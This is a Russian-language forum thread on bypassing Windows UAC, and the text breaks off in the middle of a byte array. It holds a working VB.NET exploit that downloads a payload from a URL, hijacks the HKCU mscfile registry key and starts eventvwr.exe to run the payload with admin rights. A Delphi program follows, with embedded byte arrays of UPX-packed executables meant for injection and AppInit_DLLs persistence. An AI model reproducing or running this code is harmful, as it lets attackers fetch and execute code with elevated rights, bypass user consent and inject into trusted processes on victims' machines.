- Регистрация
- 08.12.2015
- Сообщения
- 111
- Репутация
что мешает переписать на С++ ? подозреваю что руки
-
Обратная связь: [email protected]
Наш канал в telegram: https://t.me/ru_sfera
Группа VK: https://vk.com/rusfera
Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации
Вопрос Обход UAC (Bypass UAC)
- Автор темы X-Shar
- Дата начала
U
UAC
Гость
нет руки не мешают. решения, которые тут приставлены работают! НО ТОЛЬКО ПОСЛЕ перезагрузки. это не куда не идет. есть другие решения по вашему мнению?
U
UAC
Гость
- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Код (vb.net)
Код:
Module Module1
Dim URLtoFile As String = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" 'URL to PayLoad
Dim FilePath As String = IO.Path.GetTempPath
'How this works
'When eventvwr.exe is ran it starts a process call mmc.exe using the key HKLM\Software\Classes\mscfile\shell\open\command as admin
'eventvwr.exe also will lounch the key in HLCU so you just make a key and lounch
Sub Main()
Dim Client As New Net.WebClient
Client.DownloadFile(URLtoFile, FilePath + "payload.exe") 'Downlaod and Save the Payload
Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command").SetValue("", FilePath + "payload.exe") 'Create a registry entry to the payload
Process.Start("eventvwr.exe") 'Start Event Viewer
'This makes Windows lounch the payload with admin rights, as a background application
'You should also delete the key made so even viewer works normal again.
End Sub
End ModuleПривет всем, что то тыкал тыкал не адельфи, не инжектится, запускал код
Получаю:
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
Я так понимаю не инжектится певая константа (FOp: array) откуда информация о наборе байт FOp, и просвятите если не сложно как вы эти байты составили ? В ручную больно муторно. (Это если не затруднит)
И еще инжект параметра paramstr(0) это в самого себя, имеет ли это смысл ?
Нужна возможность записи в ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppinitDlls, может быть есть более изящные методы без инжекта в довереный процесс ?
Код:
program Project2;
{$APPTYPE GUI}
{$R *.res}
uses
windows,
ShellAPI,
SysUtils;
//Winapi.Windows;
//System.SysUtils;
//Winapi.Shellapi;
const
FOp: array[0..2559] of byte = ($4D, $5A, $80, $00, $01, $00, $00, $00, $04, $00, $10, $00, $FF, $FF, $00, $00, $40, $01, $00, $00, $00, $00, $00, $00, $40, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $00, $0E, $1F, $BA, $0E, $00, $B4, $09, $CD, $21, $B8, $01, $4C, $CD, $21, $54, $68, $69, $73, $20, $70, $72, $6F, $67, $72, $61, $6D, $20, $63, $61, $6E, $6E, $6F,
$74, $20, $62, $65, $20, $72, $75, $6E, $20, $69, $6E, $20, $44, $4F, $53, $20, $6D, $6F, $64, $65, $2E, $0D, $0A, $24, $00, $00, $00, $00, $00, $00, $00, $00, $50, $45, $00, $00, $4C, $01, $03, $00, $C5, $76, $35, $53, $00, $00, $00, $00, $00, $00, $00, $00, $E0, $00, $0F, $01, $0B, $01, $01, $46, $00, $10, $00, $00, $00, $10, $00, $00, $00, $40, $00, $00, $90, $52, $00, $00, $00, $50, $00, $00, $00, $60, $00, $00, $00, $00, $40, $00, $00, $10, $00, $00, $00, $02, $00, $00, $01, $00, $00, $00, $00, $00,
$00, $00, $04, $00, $00, $00, $00, $00, $00, $00, $00, $70, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $02, $00, $00, $00, $00, $10, $00, $00, $00, $10, $00, $00, $00, $00, $01, $00, $00, $00, $00, $00, $00, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $60, $00, $00, $24, $01, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $55, $50, $58, $30, $00, $00, $00, $00, $00, $40, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $00, $02, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $E0, $55, $50, $58, $31, $00, $00, $00, $00, $00, $10, $00, $00, $00, $50, $00, $00, $00, $06, $00, $00, $00, $02, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $E0, $55, $50, $58, $32, $00, $00, $00, $00, $00, $10, $00, $00, $00, $60, $00, $00, $00, $02, $00, $00, $00, $08, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $C0, $33, $2E, $30, $37, $00, $55, $50, $58,
$21, $0D, $09, $02, $09, $3D, $B4, $BA, $E9, $75, $E7, $7C, $38, $0D, $32, $00, $00, $78, $02, $00, $00, $00, $0C, $00, $00, $16, $00, $00, $B9, $9B, $66, $2B, $FF, $C7, $05, $00, $20, $40, $00, $24, $00, $09, $14, $04, $6A, $00, $76, $BB, $77, $FF, $FF, $15, $E8, $68, $00, $40, $49, $22, $10, $68, $04, $01, $00, $0F, $8C, $30, $0A, $4E, $24, $DC, $66, $B7, $E7, $04, $14, $0F, $90, $30, $1A, $0F, $2A, $22, $77, $92, $CF, $F7, $94, $1F, $3A, $2A, $22, $20, $25, $04, $F3, $7C, $BF, $48, $00, $49, $6A, $24,
$29, $EC, $32, $90, $EE, $61, $DD, $10, $19, $6A, $50, $1C, $31, $16, $36, $FD, $B6, $93, $1C, $2A, $22, $14, $04, $69, $A1, $4C, $50, $8B, $EC, $B5, $F7, $BD, $12, $50, $14, $6A, $A1, $35, $2B, $05, $48, $1A, $BE, $4B, $2E, $BB, $40, $0A, $54, $08, $D0, $88, $44, $10, $05, $E6, $76, $00, $DF, $75, $DF, $FD, $5C, $00, $73, $00, $79, $03, $70, $00, $72, $00, $65, $05, $5C, $1B, $43, $00, $52, $00, $59, $36, $F3, $FF, $FF, $00, $50, $00, $54, $00, $42, $00, $41, $00, $53, $00, $45, $00, $2E, $00, $64, $00,
$6C, $00, $6C, $0B, $6C, $B7, $B9, $FF, $EF, $27, $76, $00, $61, $00, $74, $00, $69, $00, $6F, $00, $6E, $00, $3A, $23, $1D, $6D, $0D, $75, $9F, $E9, $36, $0B, $69, $49, $74, $1D, $6F, $07, $21, $BD, $B9, $BB, $CD, $13, $2D, $77, $23, $7B, $00, $33, $15, $27, $30, $00, $35, $B2, $3D, $77, $D7, $01, $37, $03, $2D, $00, $38, $01, $0B, $09, $34, $D7, $8D, $7C, $37, $30, $13, $39, $00, $32, $00, $37, $31, $01, $62, $17, $77, $5D, $F7, $BA, $05, $64, $09, $49, $30, $1F, $7D, $85, $75, $55, $D0, $FF, $FF, $FF,
$FF, $3A, $57, $88, $50, $48, $92, $77, $11, $B8, $5B, $DB, $8E, $09, $5F, $AB, $7A, $94, $5C, $0A, $13, $4C, $B4, $D6, $4B, $F7, $83, $6F, $C9, $F8, $1E, $6D, $82, $22, $AC, $F8, $FF, $43, $18, $E7, $EE, $42, $BC, $55, $A1, $E2, $61, $C3, $7B, $FE, $32, $72, $65, $07, $A2, $50, $30, $13, $5E, $2B, $B2, $C9, $00, $68, $03, $72, $B6, $69, $96, $30, $AA, $BA, $C6, $30, $13, $9C, $DB, $AD, $CA, $56, $00, $47, $04, $31, $0B, $3B, $95, $2D, $39, $F4, $00, $24, $31, $07, $8A, $2A, $A4, $CE, $FD, $47, $51, $01,
$B6, $0C, $7C, $2F, $FF, $5F, $36, $88, $20, $01, $45, $78, $69, $74, $50, $72, $6F, $63, $65, $73, $73, $47, $65, $74, $B1, $ED, $B7, $FF, $54, $65, $6D, $70, $50, $61, $74, $68, $57, $0D, $6C, $73, $74, $72, $63, $0A, $57, $17, $B3, $FD, $DF, $DA, $53, $79, $0D, $1A, $44, $69, $72, $65, $63, $74, $6F, $72, $79, $57, $42, $89, $EE, $FD, $ED, $4F, $E8, $43, $6F, $49, $6E, $44, $69, $61, $6C, $69, $7A, $65, $0D, $2D, $BB, $D9, $6C, $EE, $4F, $62, $6A, $27, $23, $93, $1C, $21, $53, $48, $43, $39, $7F, $DB,
$BA, $5B, $4B, $65, $49, $44, $46, $6E, $6D, $62, $72, $73, $69, $6E, $67, $4E, $F9, $2F, $4F, $E8, $61, $6D, $65, $8C, $50, $45, $4C, $01, $03, $00, $C5, $76, $35, $53, $83, $34, $FF, $0F, $E0, $00, $0F, $01, $0B, $01, $01, $46, $00, $02, $08, $10, $EC, $66, $DF, $60, $03, $20, $0C, $40, $0B, $1F, $01, $00, $BD, $67, $87, $9D, $04, $3C, $40, $17, $19, $82, $06, $2C, $78, $CB, $96, $37, $29, $0E, $34, $0C, $45, $F6, $26, $42, $1A, $00, $2E, $F6, $0D, $E9, $2E, $10, $78, $74, $90, $ED, $AC, $02, $23, $0B,
$16, $EE, $16, $EA, $60, $2E, $64, $3D, $61, $9C, $64, $03, $1B, $AC, $05, $FB, $06, $EC, $F2, $1B, $6C, $6C, $F6, $C0, $2E, $69, $28, $CB, $30, $4B, $0A, $27, $EE, $84, $68, $29, $02, $6C, $91, $07, $00, $00, $00, $00, $00, $80, $04, $00, $FF, $00, $00, $00, $60, $BE, $15, $50, $40, $00, $8D, $BE, $EB, $BF, $FF, $FF, $57, $83, $CD, $FF, $EB, $10, $90, $90, $90, $90, $90, $90, $8A, $06, $46, $88, $07, $47, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $72, $ED, $B8, $01, $00, $00, $00, $01, $DB,
$75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C0, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73, $E4, $31, $C9, $83, $E8, $03, $72, $0D, $C1, $E0, $08, $8A, $06, $46, $83, $F0, $FF, $74, $74, $89, $C5, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $75, $20, $41, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73,
$E4, $83, $C1, $02, $81, $FD, $00, $F3, $FF, $FF, $83, $D1, $01, $8D, $14, $2F, $83, $FD, $FC, $76, $0F, $8A, $02, $42, $88, $07, $47, $49, $75, $F7, $E9, $63, $FF, $FF, $FF, $90, $8B, $02, $83, $C2, $04, $89, $07, $83, $C7, $04, $83, $E9, $04, $77, $F1, $01, $CF, $E9, $4C, $FF, $FF, $FF, $5E, $89, $F7, $B9, $01, $00, $00, $00, $8A, $07, $47, $2C, $E8, $3C, $01, $77, $F7, $8B, $07, $8A, $5F, $04, $86, $C4, $C1, $C0, $10, $86, $C4, $29, $F8, $80, $EB, $E8, $01, $F0, $89, $07, $83, $C7, $05, $88, $D8, $E2,
$E0, $8D, $BE, $00, $30, $00, $00, $8B, $07, $09, $C0, $74, $3C, $8B, $5F, $04, $8D, $84, $30, $00, $50, $00, $00, $01, $F3, $50, $83, $C7, $08, $FF, $96, $50, $50, $00, $00, $95, $8A, $07, $47, $08, $C0, $74, $DC, $89, $F9, $57, $48, $F2, $AE, $55, $FF, $96, $54, $50, $00, $00, $09, $C0, $74, $07, $89, $03, $83, $C3, $04, $EB, $E1, $FF, $96, $64, $50, $00, $00, $8B, $AE, $58, $50, $00, $00, $8D, $BE, $00, $F0, $FF, $FF, $BB, $00, $10, $00, $00, $50, $54, $6A, $04, $53, $57, $FF, $D5, $8D, $87, $9F, $01,
$00, $00, $80, $20, $7F, $80, $60, $28, $7F, $58, $50, $54, $50, $53, $57, $FF, $D5, $58, $61, $8D, $44, $24, $80, $6A, $00, $39, $C4, $75, $FA, $83, $EC, $80, $E9, $E7, $BB, $FF, $FF, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $7C, $60, $00, $00, $50, $60, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $89, $60, $00, $00, $6C, $60, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $93, $60, $00, $00, $74, $60, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $9E, $60, $00, $00, $AC, $60, $00, $00,
$BC, $60, $00, $00, $CC, $60, $00, $00, $DA, $60, $00, $00, $E8, $60, $00, $00, $00, $00, $00, $00, $F6, $60, $00, $00, $00, $00, $00, $00, $04, $61, $00, $00, $00, $00, $00, $00, $4B, $45, $52, $4E, $45, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $4F, $4C, $45, $33, $32, $2E, $44, $4C, $4C, $00, $53, $48, $45, $4C, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $00, $4C, $6F, $61, $64, $4C, $69, $62, $72, $61, $72, $79, $41, $00, $00, $47, $65, $74, $50, $72, $6F, $63, $41, $64, $64, $72, $65, $73, $73, $00, $00,
$56, $69, $72, $74, $75, $61, $6C, $50, $72, $6F, $74, $65, $63, $74, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $41, $6C, $6C, $6F, $63, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $46, $72, $65, $65, $00, $00, $00, $45, $78, $69, $74, $50, $72, $6F, $63, $65, $73, $73, $00, $00, $00, $43, $6F, $47, $65, $74, $4F, $62, $6A, $65, $63, $74, $00, $00, $00, $53, $48, $43, $72, $65, $61, $74, $65, $49, $74, $65, $6D, $46, $72, $6F, $6D, $50, $61, $72, $73, $69, $6E, $67, $4E, $61, $6D, $65, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);
DllDummy: array[0..3583] of byte = ($4D, $5A, $90, $00, $03, $00, $00, $00, $04, $00, $00, $00, $FF, $FF, $00, $00, $B8, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $00, $0E, $1F, $BA, $0E, $00, $B4, $09, $CD, $21, $B8, $01, $4C, $CD, $21, $54, $68, $69, $73, $20, $70, $72, $6F, $67, $72, $61, $6D, $20, $63, $61, $6E, $6E,
$6F, $74, $20, $62, $65, $20, $72, $75, $6E, $20, $69, $6E, $20, $44, $4F, $53, $20, $6D, $6F, $64, $65, $2E, $0D, $0D, $0A, $24, $00, $00, $00, $00, $00, $00, $00, $50, $45, $00, $00, $4C, $01, $03, $00, $FA, $BF, $34, $53, $00, $00, $00, $00, $00, $00, $00, $00, $E0, $00, $0E, $21, $0B, $01, $02, $32, $00, $10, $00, $00, $00, $10, $00, $00, $00, $70, $00, $00, $60, $88, $00, $00, $00, $80, $00, $00, $00, $90, $00, $00, $00, $00, $00, $10, $00, $10, $00, $00, $00, $02, $00, $00, $04, $00, $00, $00, $00,
$00, $00, $00, $04, $00, $00, $00, $00, $00, $00, $00, $00, $A0, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $03, $00, $00, $00, $00, $00, $10, $00, $00, $10, $00, $00, $00, $00, $10, $00, $00, $10, $00, $00, $00, $00, $00, $00, $10, $00, $00, $00, $00, $91, $00, $00, $48, $00, $00, $00, $00, $90, $00, $00, $00, $01, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $48, $91, $00, $00, $0C, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $55, $50, $58, $30, $00, $00, $00, $00, $00, $70, $00, $00, $00, $10, $00, $00, $00, $00, $00, $00, $00, $02, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $00, $00, $E0, $55, $50, $58, $31, $00, $00, $00, $00, $00, $10, $00, $00, $00, $80, $00, $00, $00, $0A, $00, $00, $00, $02, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $E0, $55, $50, $58, $32, $00, $00, $00, $00, $00, $10, $00, $00, $00, $90, $00, $00, $00, $02, $00, $00, $00, $0C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $40, $00, $00, $C0, $33, $2E, $30, $37, $00, $55, $50,
$58, $21, $0D, $09, $02, $0A, $53, $F5, $AB, $08, $7F, $8C, $C0, $1C, $D1, $63, $00, $00, $41, $08, $00, $00, $00, $1A, $00, $00, $00, $00, $00, $B4, $7E, $DB, $FF, $FF, $83, $7C, $24, $08, $01, $75, $0E, $8B, $44, $24, $04, $A3, $00, $00, $32, $D8, $E8, $22, $05, $00, $14, $02, $75, $77, $19, $EC, $C7, $06, $00, $75, $05, $E8, $38, $12, $03, $B8, $01, $0B, $E5, $B3, $9D, $7B, $C2, $0C, $00, $68, $06, $04, $10, $00, $09, $E8, $BB, $0F, $DD, $6D, $BA, $7F, $3F, $D4, $E8, $EB, $16, $0E, $F1, $E8, $18, $18,
$C3, $E8, $11, $7B, $37, $76, $F9, $1E, $26, $17, $FF, $35, $1F, $97, $1A, $C3, $C3, $8B, $15, $0C, $9F, $3B, $1B, $BB, $E8, $52, $52, $14, $E8, $43, $AC, $4D, $17, $30, $EF, $2E, $DB, $FD, $00, $01, $14, $24, $E8, $47, $09, $8F, $05, $1D, $65, $37, $31, $C0, $C3, $00, $38, $14, $44, $65, $00, $FF, $25, $91, $91, $B1, $25, $70, $C0, $05, $D8, $DC, $E0, $27, $F8, $91, $E0, $E4, $FF, $74, $24, $04, $A2, $EC, $E8, $CE, $03, $D2, $FD, $97, $8B, $85, $C0, $74, $17, $FF, $30, $FF, $15, $1A, $E8, $D8, $7F, $C1,
$BF, $37, $C2, $04, $00, $6A, $01, $10, $E8, $55, $06, $14, $10, $1E, $6A, $DF, $B1, $7F, $C1, $04, $6A, $53, $F0, $E8, $F2, $05, $12, $32, $F4, $0E, $EC, $AE, $7B, $FF, $63, $3F, $EC, $C3, $55, $8B, $EC, $51, $53, $56, $57, $43, $22, $18, $35, $FF, $FF, $63, $FF, $83, $4D, $FC, $FF, $8B, $F8, $33, $F6, $20, $F0, $8A, $08, $84, $C9, $74, $75, $8B, $55, $08, $80, $F9, $20, $75, $06, $40, $80, $77, $FB, $F6, $F6, $38, $20, $74, $FA, $13, $33, $DB, $43, $0F, $22, $75, $23, $40, $0A, $8B, $F0, $20, $FD, $B7,
$DF, $5D, $16, $0D, $74, $07, $40, $2C, $75, $F4, $23, $00, $74, $05, $8B, $D0, $40, $EB, $21, $03, $73, $AD, $BB, $04, $EB, $1D, $1D, $17, $23, $3D, $1F, $F6, $B7, $B7, $6F, $18, $74, $04, $EB, $DE, $45, $8B, $0F, $3B, $6D, $75, $07, $8B, $4D, $08, $85, $18, $0B, $EE, $BA, $FF, $1A, $85, $DB, $74, $03, $FF, $45, $FC, $5E, $F6, $27, $8E, $83, $7D, $F7, $F7, $F6, $FF, $76, $13, $8B, $10, $EB, $14, $85, $F6, $74, $0D, $2B, $D6, $89, $11, $FF, $2A, $C6, $EB, $06, $2E, $FE, $D9, $73, $7F, $83, $21, $00, $5F,
$5E, $5B, $C9, $EF, $C0, $BD, $83, $65, $FC, $00, $E8, $56, $70, $EB, $3E, $E6, $E4, $4E, $78, $02, $89, $08, $D8, $8D, $3E, $50, $E8, $DF, $DC, $FF, $AE, $2E, $00, $75, $0C, $8B, $75, $FC, $56, $8B, $D8, $E8, $4F, $E4, $07, $F8, $53, $57, $E8, $5A, $E4, $EC, $BF, $B7, $EE, $C4, $0C, $C6, $04, $37, $4D, $08, $1B, $B7, $FD, $0E, $EF, $4E, $30, $F4, $6A, $02, $4A, $3F, $FF, $D6, $02, $37, $04, $6E, $72, $C3, $87, $11, $F8, $5E, $7F, $0D, $FF, $37, $9D, $E6, $CA, $7F, $E1, $89, $07, $C9, $45, $8D, $6C, $24,
$9C, $81, $EC, $C4, $00, $73, $D7, $76, $F7, $DF, $FE, $6A, $44, $5E, $56, $33, $FF, $3B, $DC, $53, $47, $50, $C7, $45, $60, $20, $17, $89, $5D, $58, $02, $CB, $B2, $2C, $CB, $50, $44, $5C, $48, $54, $40, $ED, $1F, $B9, $2D, $4C, $1E, $30, $0C, $34, $89, $7D, $38, $E8, $F3, $FD, $A8, $74, $FF, $ED, $EE, $8A, $4D, $78, $94, $89, $75, $DC, $10, $08, $F6, $C1, $02, $74, $0B, $33, $C0, $43, $28, $6F, $8D, $F8, $DF, $EB, $02, $8B, $C7, $66, $89, $45, $0C, $BE, $00, $00, $1A, $40, $74, $1D, $6F, $DD, $0B, $6F,
$7F, $7C, $3B, $C3, $7E, $8B, $40, $0C, $06, $0F, $4B, $08, $01, $01, $DF, $DE, $5E, $36, $45, $14, $4C, $EB, $39, $21, $04, $74, $38, $04, $10, $74, $33, $53, $EE, $AC, $D9, $6E, $8A, $30, $50, $03, $50, $58, $C6, $FC, $C5, $CD, $B0, $FB, $B7, $1C, $3D, $58, $09, $75, $08, $8D, $7D, $50, $31, $E8, $01, $23, $40, $5B, $BB, $E0, $88, $4C, $5A, $49, $60, $F7, $1B, $85, $E0, $CD, $64, $DB, $B7, $04, $18, $3C, $74, $72, $F6, $0A, $08, $43, $5C, $44, $F9, $32, $32, $21, $5C, $44, $18, $E8, $BD, $FE, $93, $74,
$C1, $5E, $3C, $47, $38, $20, $54, $CB, $C8, $84, $34, $48, $54, $48, $1C, $7F, $B8, $5D, $C8, $E8, $84, $85, $18, $74, $2A, $86, $31, $00, $39, $5D, $B3, $B9, $8D, $8D, $14, $20, $6A, $8D, $D6, $A3, $0B, $18, $B7, $D3, $2C, $4F, $F5, $18, $1C, $F4, $4A, $7D, $6C, $B2, $B9, $DB, $F6, $3B, $FB, $75, $0A, $3C, $6C, $31, $20, $06, $0D, $1C, $70, $8D, $B8, $70, $B6, $0E, $70, $E6, $D6, $04, $F7, $14, $FF, $EE, $C6, $75, $70, $85, $E8, $CC, $09, $59, $59, $8D, $44, $06, $04, $50, $53, $76, $DF, $FE, $8B, $09,
$8F, $31, $04, $80, $3F, $22, $46, $7C, $74, $23, $BE, $30, $04, $56, $A7, $7B, $EB, $36, $30, $AA, $27, $57, $32, $7C, $E8, $A7, $08, $56, $6D, $6C, $FB, $C7, $9E, $04, $2A, $18, $EB, $09, $57, $1D, $8C, $45, $8B, $51, $21, $5F, $C1, $F4, $38, $1E, $74, $19, $51, $DE, $2A, $7C, $B6, $0D, $DB, $C8, $73, $10, $DF, $74, $93, $07, $38, $B2, $03, $DB, $A5, $D9, $16, $DC, $74, $FF, $20, $DC, $75, $74, $79, $75, $2F, $1F, $76, $B7, $60, $02, $4C, $53, $07, $7C, $53, $0F, $31, $08, $0F, $84, $8E, $B6, $D2, $F2,
$73, $F7, $F2, $30, $E8, $5C, $40, $1C, $5C, $F2, $3C, $CF, $D6, $DB, $09, $58, $58, $54, $54, $B1, $D1, $50, $B6, $04, $24, $59, $01, $18, $6A, $D3, $85, $36, $D6, $D5, $20, $41, $0C, $1F, $A8, $45, $BF, $DD, $FB, $FE, $F4, $D8, $57, $10, $10, $6A, $28, $EB, $E0, $E8, $74, $02, $AC, $57, $FC, $ED, $DB, $DB, $58, $16, $14, $95, $20, $89, $06, $04, $28, $89, $46, $04, $05, $97, $65, $59, $96, $44, $0C, $50, $08, $48, $10, $E9, $90, $ED, $7D, $86, $2A, $7C, $52, $D6, $09, $8D, $3D, $79, $9E, $67, $9B, $D7,
